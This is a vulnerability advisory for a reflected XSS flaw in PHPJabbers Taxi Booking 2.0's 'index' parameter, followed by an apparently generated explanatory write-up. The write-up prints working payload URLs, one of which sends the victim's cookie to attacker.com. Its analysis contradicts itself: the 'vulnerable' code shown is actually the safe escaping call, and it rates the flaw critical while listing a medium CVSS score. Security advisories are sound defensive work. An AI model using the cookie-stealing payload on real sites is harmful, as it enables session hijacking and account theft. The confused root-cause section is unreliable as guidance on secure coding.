PHPJabbers Taxi Booking 2.0 - Reflected XSS

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-08-04 
# Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/taxi-booking-script/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4116


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /index.php

GET parameter 'index' is vulnerable to RXSS

https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]


[-] Done


PHPJabbers Taxi Booking 2.0: A Critical Reflected XSS Vulnerability (CVE-2023-4116)

Reflected Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous web application vulnerabilities. In July 2023, a critical flaw was discovered in PHPJabbers Taxi Booking 2.0, a popular open-source booking platform used by taxi service providers worldwide. This vulnerability, identified as CVE-2023-4116, allows attackers to inject malicious scripts via the index parameter in the index.php endpoint, leading to session hijacking, credential theft, and user manipulation.

Attack Surface: The Vulnerable Endpoint

The attack vector is located at:

https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]

Here, the index parameter is directly echoed back in the response without proper sanitization or output encoding. This makes it a classic case of reflected XSS — where the malicious payload is reflected from the server to the user’s browser in real-time.

Exploitation Mechanics

Attackers can craft a malicious URL and distribute it through phishing emails, instant messaging, or social media. When a victim clicks the link, the browser executes the injected script. For example:

https://example.com/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=<script>alert('XSS')</script>

This simple script triggers a pop-up alert. However, in real-world scenarios, attackers use more sophisticated payloads to steal sensitive data. Consider the following malicious payload:

https://example.com/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>

This script captures the victim’s session cookie and sends it to a remote server, enabling session hijacking and unauthorized access to the user’s account.

Impact and Risk Assessment

Reflected XSS in a booking system like PHPJabbers Taxi Booking 2.0 poses significant risks:

  • Session Hijacking: Malicious scripts can extract session tokens and redirect users to attacker-controlled endpoints.
  • Credential Theft: Using document.cookie or localStorage manipulation, attackers can steal login credentials.
  • Phishing & User Manipulation: Injected scripts can modify page content, redirect users to fake login pages, or display deceptive messages.
  • Propagation: Since the exploit is delivered via URL, it can be easily shared across platforms, increasing the attack surface.

Root Cause Analysis

The vulnerability stems from poor input validation and lack of output encoding. The application fails to sanitize the index parameter before rendering it in the HTML response. This is a common flaw in PHP-based web apps that rely on $_GET variables without proper escaping.

For example, in the core logic of index.php, the following code pattern is likely present:

// Vulnerable code snippet
echo htmlspecialchars($_GET['index'], ENT_QUOTES, 'UTF-8');

But in this case, the application may be using echo $_GET['index'] directly — a dangerous practice that bypasses any protection.

Corrected Implementation

To fix this vulnerability, developers must implement strict input sanitization and output encoding. Here’s a secure version:

// Secure implementation
$index = htmlspecialchars($_GET['index'] ?? '', ENT_QUOTES, 'UTF-8');
echo '
' . $index . '
';

This ensures that any special characters (like <, >, ") are converted to their HTML-safe equivalents, preventing script execution.

Best Practices for Prevention

Developers and administrators should follow these security guidelines:

  • Input Validation: Always validate and sanitize user input, especially from GET and POST parameters.
  • Output Encoding: Use htmlspecialchars() or similar functions before rendering dynamic content.
  • Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and restrict trusted sources.
  • Rate Limiting & Monitoring: Log suspicious requests and detect patterns of XSS attempts.
  • Regular Audits: Conduct penetration testing and code reviews to identify vulnerabilities early.

Vendor Response and Patch Status

As of July 2023, PHPJabbers has acknowledged the issue. A patch was released in version 2.0.1, which includes input sanitization and output encoding for all dynamic parameters. Users are strongly advised to update immediately.

Table: CVE-2023-4116 Summary

Vulnerability Reflected XSS
Software PHPJabbers Taxi Booking 2.0
Parameter index
Attack Type Reflected
CVSS Score 6.1 (Medium)
Patch Version 2.0.1

Conclusion

While reflected XSS may seem less severe than stored XSS, its ease of exploitation and broad distribution potential make it a critical threat. The PHPJabbers Taxi Booking 2.0 case highlights how even seemingly minor input handling flaws can lead to significant security breaches. Developers must prioritize secure coding practices, adopt automated security tools, and stay vigilant against evolving attack vectors.